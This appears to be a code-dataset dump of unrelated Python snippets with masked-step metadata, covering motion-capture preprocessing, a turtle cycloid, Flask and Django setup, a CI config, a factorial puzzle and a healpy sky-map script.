'))\n\n\nif __name__ == '__main__':\n t0 = timeit.default_timer()\n\n args = parse_args()\n\n os.makedirs(args.out_dir)\n\n aois = sorted([\n d for d in os.listdir(args.train_dir)\n if os.path.isdir(os.path.join(args.train_dir, d))\n ])\n\n random.seed(777)\n random.shuffle(aois)\n\n # split aois into train and val\n n = args.split_num\n aois_divided = np.array([aois[i::n] for i in range(n)])\n\n for val_idx in range(n):\n # dump file paths for val split\n val_aois = aois_divided[val_idx]\n\n dump_file_paths(val_aois,\n os.path.join(args.out_dir, f'val_{val_idx}.json'),\n args.train_dir, args.mask_dir)\n\n # dump file paths for train split\n train_mask = np.ones(n, dtype=bool)\n train_mask[val_idx] = False\n train_aois = aois_divided[train_mask]\n train_aois = np.concatenate(train_aois, axis=0).tolist()\n\n dump_file_paths(train_aois,\n os.path.join(args.out_dir, f'train_{val_idx}.json'),\n args.train_dir, args.mask_dir)\n\n elapsed = timeit.default_timer() - t0\n print('Time: {:.3f} min'.format(elapsed / 60.0))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import os, pickle, logging, numpy as np
from .. import utils as U
class CMU_Generator():
def __init__(self, args, dataset_args):
self.in_path = dataset_args['cmu_data_path']
self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)
self.actions = ['walking', 'running', 'directing_traffic', 'soccer',
'basketball', 'washwindow', 'jumping', 'basketball_signal']
self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26,
39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83,
87, 88, 89, 90, 91, 92, 108, 109, 110, 114, 115, 116]
self.dim_use = list(set(range(39*3)).difference(set(self.dim_ignore)))
U.create_folder(self.out_path)
def start(self):
logging.info('Reading data ...')
self.all_train_data, train_data = self.read_data('train')
_, eval_data = self.read_data('test')
logging.info('Normalizing data ...')
self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = self.normalize_state()
train_data = self.normalize_data(train_data)
eval_data = self.normalize_data(eval_data)
logging.info('Saving data ...')
with open('{}/data.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((train_data, eval_data, self.actions), f)
with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero), f)
with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((self.dim_use, self.dim_ignore), f)
def read_data(self, phase):
all_data, even_data = [], {}
for action_idx, action in enumerate(self.actions):
action_path = '{}/{}/{}'.format(self.in_path, phase, action)
for sequence_idx, file in enumerate(os.listdir(action_path)):
sequence = []
with open('{}/{}'.format(action_path, file), 'r') as f:
for line in f.readlines():
line = line.strip().split(',')
if len(line) > 0:
sequence.append(np.array([np.float32(x) for x in line]))
sequence = np.array(sequence)
all_data.append(sequence)
even_data[(action_idx, sequence_idx)] = sequence[range(0,sequence.shape[0],2),:]
return np.concatenate(all_data, axis=0), even_data
def normalize_state(self):
data_mean = np.mean(self.all_train_data, axis=0)
data_std = np.std(self.all_train_data, axis=0)
dim_zero = list(np.where(data_std < 0.0001)[0])
dim_nonzero = list(np.where(data_std >= 0.0001)[0])
data_std[dim_zero] = 1.0
return data_mean, data_std, dim_zero, dim_nonzero
def normalize_data(self, data):
for key in data.keys():
data[key] = np.divide((data[key] - self.data_mean), self.data_std)
data[key] = data[key][:, self.dim_use]
return data
|
normal
|
{
"blob_id": "2c58a9e83f80d437160b87ec64c7631e7a35bf90",
"index": 6315,
"step-1": "<mask token>\n\n\nclass CMU_Generator:\n <mask token>\n <mask token>\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n <mask token>\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-2": "<mask token>\n\n\nclass CMU_Generator:\n\n def __init__(self, args, dataset_args):\n self.in_path = dataset_args['cmu_data_path']\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, \n 26, 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83, 87, 88, 89,\n 90, 91, 92, 108, 109, 110, 114, 115, 116]\n self.dim_use = list(set(range(39 * 3)).difference(set(self.dim_ignore))\n )\n U.create_folder(self.out_path)\n <mask token>\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n\n def normalize_state(self):\n data_mean = np.mean(self.all_train_data, axis=0)\n data_std = np.std(self.all_train_data, axis=0)\n dim_zero = list(np.where(data_std < 0.0001)[0])\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\n data_std[dim_zero] = 1.0\n return data_mean, data_std, dim_zero, dim_nonzero\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-3": "<mask token>\n\n\nclass CMU_Generator:\n\n def __init__(self, args, dataset_args):\n self.in_path = dataset_args['cmu_data_path']\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, \n 26, 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83, 87, 88, 89,\n 90, 91, 92, 108, 109, 110, 114, 115, 116]\n self.dim_use = list(set(range(39 * 3)).difference(set(self.dim_ignore))\n )\n U.create_folder(self.out_path)\n\n def start(self):\n logging.info('Reading data ...')\n self.all_train_data, train_data = self.read_data('train')\n _, eval_data = self.read_data('test')\n logging.info('Normalizing data ...')\n self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = (self\n .normalize_state())\n train_data = self.normalize_data(train_data)\n eval_data = self.normalize_data(eval_data)\n logging.info('Saving data ...')\n with open('{}/data.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((train_data, eval_data, self.actions), f)\n with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.data_mean, self.data_std, self.dim_zero, self\n .dim_nonzero), f)\n with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.dim_use, self.dim_ignore), f)\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n\n def normalize_state(self):\n data_mean = np.mean(self.all_train_data, axis=0)\n data_std = np.std(self.all_train_data, axis=0)\n dim_zero = list(np.where(data_std < 0.0001)[0])\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\n data_std[dim_zero] = 1.0\n return data_mean, data_std, dim_zero, dim_nonzero\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-4": "import os, pickle, logging, numpy as np\nfrom .. import utils as U\n\n\nclass CMU_Generator:\n\n def __init__(self, args, dataset_args):\n self.in_path = dataset_args['cmu_data_path']\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, \n 26, 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83, 87, 88, 89,\n 90, 91, 92, 108, 109, 110, 114, 115, 116]\n self.dim_use = list(set(range(39 * 3)).difference(set(self.dim_ignore))\n )\n U.create_folder(self.out_path)\n\n def start(self):\n logging.info('Reading data ...')\n self.all_train_data, train_data = self.read_data('train')\n _, eval_data = self.read_data('test')\n logging.info('Normalizing data ...')\n self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = (self\n .normalize_state())\n train_data = self.normalize_data(train_data)\n eval_data = self.normalize_data(eval_data)\n logging.info('Saving data ...')\n with open('{}/data.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((train_data, eval_data, self.actions), f)\n with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.data_mean, self.data_std, self.dim_zero, self\n .dim_nonzero), f)\n with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.dim_use, self.dim_ignore), f)\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n\n def normalize_state(self):\n data_mean = np.mean(self.all_train_data, axis=0)\n data_std = np.std(self.all_train_data, axis=0)\n dim_zero = list(np.where(data_std < 0.0001)[0])\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\n data_std[dim_zero] = 1.0\n return data_mean, data_std, dim_zero, dim_nonzero\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-5": "import os, pickle, logging, numpy as np\r\n\r\nfrom .. import utils as U\r\n\r\n\r\nclass CMU_Generator():\r\n def __init__(self, args, dataset_args):\r\n self.in_path = dataset_args['cmu_data_path']\r\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\r\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\r\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\r\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26,\r\n 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83,\r\n 87, 88, 89, 90, 91, 92, 108, 109, 110, 114, 115, 116]\r\n self.dim_use = list(set(range(39*3)).difference(set(self.dim_ignore)))\r\n U.create_folder(self.out_path)\r\n\r\n def start(self):\r\n logging.info('Reading data ...')\r\n self.all_train_data, train_data = self.read_data('train')\r\n _, eval_data = self.read_data('test')\r\n\r\n logging.info('Normalizing data ...')\r\n self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = self.normalize_state()\r\n train_data = self.normalize_data(train_data)\r\n eval_data = self.normalize_data(eval_data)\r\n\r\n logging.info('Saving data ...')\r\n with open('{}/data.pkl'.format(self.out_path), 'wb') as f:\r\n pickle.dump((train_data, eval_data, self.actions), f)\r\n with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:\r\n pickle.dump((self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero), f)\r\n with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:\r\n pickle.dump((self.dim_use, self.dim_ignore), f)\r\n\r\n def read_data(self, phase):\r\n all_data, even_data = [], {}\r\n for action_idx, action in enumerate(self.actions):\r\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\r\n for sequence_idx, file in enumerate(os.listdir(action_path)):\r\n sequence = []\r\n with open('{}/{}'.format(action_path, file), 'r') as f:\r\n for line in f.readlines():\r\n line = line.strip().split(',')\r\n if len(line) > 0:\r\n sequence.append(np.array([np.float32(x) for x in line]))\r\n sequence = np.array(sequence)\r\n all_data.append(sequence)\r\n even_data[(action_idx, sequence_idx)] = sequence[range(0,sequence.shape[0],2),:]\r\n return np.concatenate(all_data, axis=0), even_data\r\n\r\n def normalize_state(self):\r\n data_mean = np.mean(self.all_train_data, axis=0)\r\n data_std = np.std(self.all_train_data, axis=0)\r\n dim_zero = list(np.where(data_std < 0.0001)[0])\r\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\r\n data_std[dim_zero] = 1.0\r\n return data_mean, data_std, dim_zero, dim_nonzero\r\n\r\n def normalize_data(self, data):\r\n for key in data.keys():\r\n data[key] = np.divide((data[key] - self.data_mean), self.data_std)\r\n data[key] = data[key][:, self.dim_use]\r\n return data\r\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
import math
import turtle
wn = turtle.Screen()
wn.bgcolor('lightblue')
PI=3.14
R_outer=50
R_inner=200
fred = turtle.Turtle()
fred.speed(99999)
def cycloid(r, k, nos_cycle, direction):
n=36
angle=2*PI/n
x=1
y=0
for i in range(nos_cycle*n):
beta = i * angle
x = r*(beta-math.sin(beta))
y = r*(1-math.cos(beta))
### equally valid
###x = ((r)*math.cos(beta) + r*beta)
###y = direction*(r)*math.sin(beta)
fred.goto(x,y)
cycloid(10, 0.1, 100, -1)
wn.exitonclick()
|
normal
|
{
"blob_id": "a62dd287f9fc6f79ef95a3de83f52c794efe00a7",
"index": 7407,
"step-1": "\nimport math\nimport turtle\n\nwn = turtle.Screen()\nwn.bgcolor('lightblue')\nPI=3.14\nR_outer=50\nR_inner=200\n\nfred = turtle.Turtle()\nfred.speed(99999)\n\ndef cycloid(r, k, nos_cycle, direction):\n n=36\n angle=2*PI/n\n x=1\n y=0\n for i in range(nos_cycle*n):\n\t beta = i * angle \n\t x = r*(beta-math.sin(beta))\n\t y = r*(1-math.cos(beta))\n\t ### equally valid\n ###x = ((r)*math.cos(beta) + r*beta)\n ###y = direction*(r)*math.sin(beta)\n fred.goto(x,y)\n\ncycloid(10, 0.1, 100, -1)\n\nwn.exitonclick()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
password = '#Garb1122'
|
normal
|
{
"blob_id": "918358f6e8e3f1c601b18a3c08fc6b7c024721ba",
"index": 5547,
"step-1": "<mask token>\n",
"step-2": "password = '#Garb1122'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os
from flask import Flask
from flask.ext.login import LoginManager
from config import basedir
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.openid import OpenID
from momentjs import momentjs
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
lm = LoginManager()
lm.init_app(app)
app.jinja_env.globals['momentjs'] = momentjs
from app import views, models
|
normal
|
{
"blob_id": "8c1bd4df5f33c433880d6a4becadf88fb922762b",
"index": 6379,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp.config.from_object('config')\n<mask token>\nlm.init_app(app)\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nlm = LoginManager()\nlm.init_app(app)\napp.jinja_env.globals['momentjs'] = momentjs\n<mask token>\n",
"step-4": "import os\nfrom flask import Flask\nfrom flask.ext.login import LoginManager\nfrom config import basedir\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.openid import OpenID\nfrom momentjs import momentjs\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nlm = LoginManager()\nlm.init_app(app)\napp.jinja_env.globals['momentjs'] = momentjs\nfrom app import views, models\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# i have created this file-hitu
from django.http import HttpResponse
from django.shortcuts import render
from .forms import Sign_Up, Login
from .models import Student
# render is used to create and impot the templates
# render takes first arg = request, 2nd arg = name of the file you want to import, 3rd arg = parameters or variable name
def index(request):
return render(request, 'index.html')
def get_name(request):
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = Sign_Up(request.POST)
# check whether it's valid:
if form.is_valid():
firstName = form.cleaned_data['first_name']
lastName = form.cleaned_data['last_name']
email = form.cleaned_data['email']
password = form.cleaned_data['password']
details = Student(first_name=firstName, last_name=lastName, email=email,
password=password) # these are models variable in red
# process the data in form.cleaned_data as required
details.save() # this is used to save all the details
# ...
# redirect to a new URL:
return render(request, 'login/new_index.html', {'form': form})
# if a GET (or any other method) we'll create a blank form
else:
form = Sign_Up()
return render(request, 'login/new_index.html', {'form': form})
def login_name(request):
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = Login(request.POST)
# check whether it's valid:
if form.is_valid():
email = form.cleaned_data['email']
password = form.cleaned_data['password']
return render(request, 'login/new_index.html', {'form': form})
# if a GET (or any other method) we'll create a blank form
else:
form = Login()
return render(request, 'login/new_index.html', {'form': form})
|
normal
|
{
"blob_id": "cbbb314a3262713f6cb2bb2dd90709d7bf1ca8eb",
"index": 6095,
"step-1": "<mask token>\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-2": "<mask token>\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\n<mask token>\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-3": "<mask token>\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef get_name(request):\n if request.method == 'POST':\n form = Sign_Up(request.POST)\n if form.is_valid():\n firstName = form.cleaned_data['first_name']\n lastName = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n details = Student(first_name=firstName, last_name=lastName,\n email=email, password=password)\n details.save()\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Sign_Up()\n return render(request, 'login/new_index.html', {'form': form})\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-4": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .forms import Sign_Up, Login\nfrom .models import Student\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef get_name(request):\n if request.method == 'POST':\n form = Sign_Up(request.POST)\n if form.is_valid():\n firstName = form.cleaned_data['first_name']\n lastName = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n details = Student(first_name=firstName, last_name=lastName,\n email=email, password=password)\n details.save()\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Sign_Up()\n return render(request, 'login/new_index.html', {'form': form})\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-5": "# i have created this file-hitu\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .forms import Sign_Up, Login\nfrom .models import Student\n\n\n# render is used to create and impot the templates\n# render takes first arg = request, 2nd arg = name of the file you want to import, 3rd arg = parameters or variable name\ndef index(request):\n return render(request, 'index.html')\n\n\ndef get_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = Sign_Up(request.POST)\n # check whether it's valid:\n if form.is_valid():\n firstName = form.cleaned_data['first_name']\n lastName = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n details = Student(first_name=firstName, last_name=lastName, email=email,\n password=password) # these are models variable in red\n # process the data in form.cleaned_data as required\n details.save() # this is used to save all the details\n # ...\n # redirect to a new URL:\n return render(request, 'login/new_index.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = Sign_Up()\n\n return render(request, 'login/new_index.html', {'form': form})\n\n\ndef login_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = Login(request.POST)\n # check whether it's valid:\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n\n return render(request, 'login/new_index.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = Login()\n\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
#
# Copyright (C) Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
GERRIT_PORT = 29418
GERRIT_USERNAME = 'dci-ci-bot'
GERRIT_HOSTNAME = 'softwarefactory-project.io'
GERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',
'/home/dci/dci-ci-bot.id_rsa')
RHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')
RHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')
RHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')
HOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME', '/home/dci/.ssh/id_rsa')
|
normal
|
{
"blob_id": "8410ff0806766a09d346e930123a2696bebb4b60",
"index": 2821,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGERRIT_PORT = 29418\nGERRIT_USERNAME = 'dci-ci-bot'\nGERRIT_HOSTNAME = 'softwarefactory-project.io'\nGERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',\n '/home/dci/dci-ci-bot.id_rsa')\nRHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')\nRHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')\nRHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')\nHOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME',\n '/home/dci/.ssh/id_rsa')\n",
"step-3": "import os\nGERRIT_PORT = 29418\nGERRIT_USERNAME = 'dci-ci-bot'\nGERRIT_HOSTNAME = 'softwarefactory-project.io'\nGERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',\n '/home/dci/dci-ci-bot.id_rsa')\nRHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')\nRHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')\nRHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')\nHOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME',\n '/home/dci/.ssh/id_rsa')\n",
"step-4": "# -*- coding: utf-8 -*-\n#\n# Copyright (C) Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nGERRIT_PORT = 29418\nGERRIT_USERNAME = 'dci-ci-bot'\nGERRIT_HOSTNAME = 'softwarefactory-project.io'\nGERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',\n '/home/dci/dci-ci-bot.id_rsa')\nRHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')\nRHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')\nRHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')\n\nHOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME', '/home/dci/.ssh/id_rsa')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
pass
|
normal
|
{
"blob_id": "0ae626df5a471af77f7361bb765b46b861ee8a2c",
"index": 7142,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-3": "import terrascript\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-4": "# terrascript/spotinst/__init__.py\n\nimport terrascript\n\nclass spotinst(terrascript.Provider):\n pass",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
from math import factorial
F = [factorial(i) for i in range(10)]
#F[9] * 8 = 2903040 > this means no 8 digit numbers
#F[9] * 7 = 2540160 < this is the maximum that I could think of
total = 0
for i in xrange(10, 2540160):
if sum([F[int(d)] for d in str(i)]) == i:
total = total + i
print total
|
normal
|
{
"blob_id": "d2e8c95dc144aa83128cc815ad145982f64b1819",
"index": 3206,
"step-1": "#!/usr/bin/env python\n\nfrom math import factorial\n\nF = [factorial(i) for i in range(10)]\n#F[9] * 8 = 2903040 > this means no 8 digit numbers\n#F[9] * 7 = 2540160 < this is the maximum that I could think of\n\ntotal = 0\nfor i in xrange(10, 2540160):\n if sum([F[int(d)] for d in str(i)]) == i:\n total = total + i\n\nprint total\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from skimage import data, filters, measure, exposure
from skimage.filters import threshold_mean
from skimage.transform import resize
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import pyfits as pf
import time
import numpy as np
import healpy as hp
from healpy.projector import CartesianProj
from healpy.projector import MollweideProj
# [email protected]
start = time.time()
path = '/Users/trygveleithesvalheim/datafiles/'
# MAX SLIDES ON N: 134 (ID:135) and 136 (ID:137)
# MAX SLIDES ON S: 6 (ID:7)
# Data: 360 degrees longitude, 50-90 latitude
# Dimensions: (480,4320)
# Full map: (2160,4320) need to add 1680
NN = 338 # Identified clouds in N. hemisphere
NS = 438 # Identified clouds in S. hemisphere
nside = 512
npix = 12*nside**2
z = np.zeros((1680, 4320)) # Extra array for full sky array
"""
full
"""
c1 = 420
c2 = 475
hdulist = pf.open(path+'data/cubesCombinedN.fits')
Nfull = hdulist[0].data
hdulist = pf.open(path+'data/cubesCombinedS.fits')
Sfull = hdulist[0].data
fullLOSN = Nfull[c1:c2].sum(axis=(0))
fullLOSS = Sfull[c1:c2].sum(axis=(0))
# Add empty array for converting to full sky
fullLOSS = np.concatenate((fullLOSS, z), axis=0)
fullLOSN = np.concatenate((z,fullLOSN), axis=0)
full = fullLOSN + fullLOSS
"""
Add full first
"""
hdulist = pf.open(path+'data/LOScloudsN.fits')
LOScloudsN = hdulist[0].data
hdulist = pf.open(path+'data/LOScloudsS.fits')
LOScloudsS = hdulist[0].data
# LOS of all clouds
LOScloudsN = LOScloudsN.sum(axis=(0))
LOScloudsS = LOScloudsS.sum(axis=(0))
# Add empty array for converting to full sky
LOScloudsS = np.concatenate((LOScloudsS, z), axis=0)
LOScloudsN = np.concatenate((z,LOScloudsN), axis=0)
# Add N and S hemisphere
image_array = LOScloudsN+LOScloudsS
"""
GENERAL
"""
# Find theta and phi coordinates of image
theta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]
phi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])
# Get pixel positions of full picture
pix = hp.ang2pix(nside, theta, phi)
"""
GENERAL END
"""
# Make healpix map array
healpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)
# put image in healpy map array
healpix_map[pix] = image_array # Magic
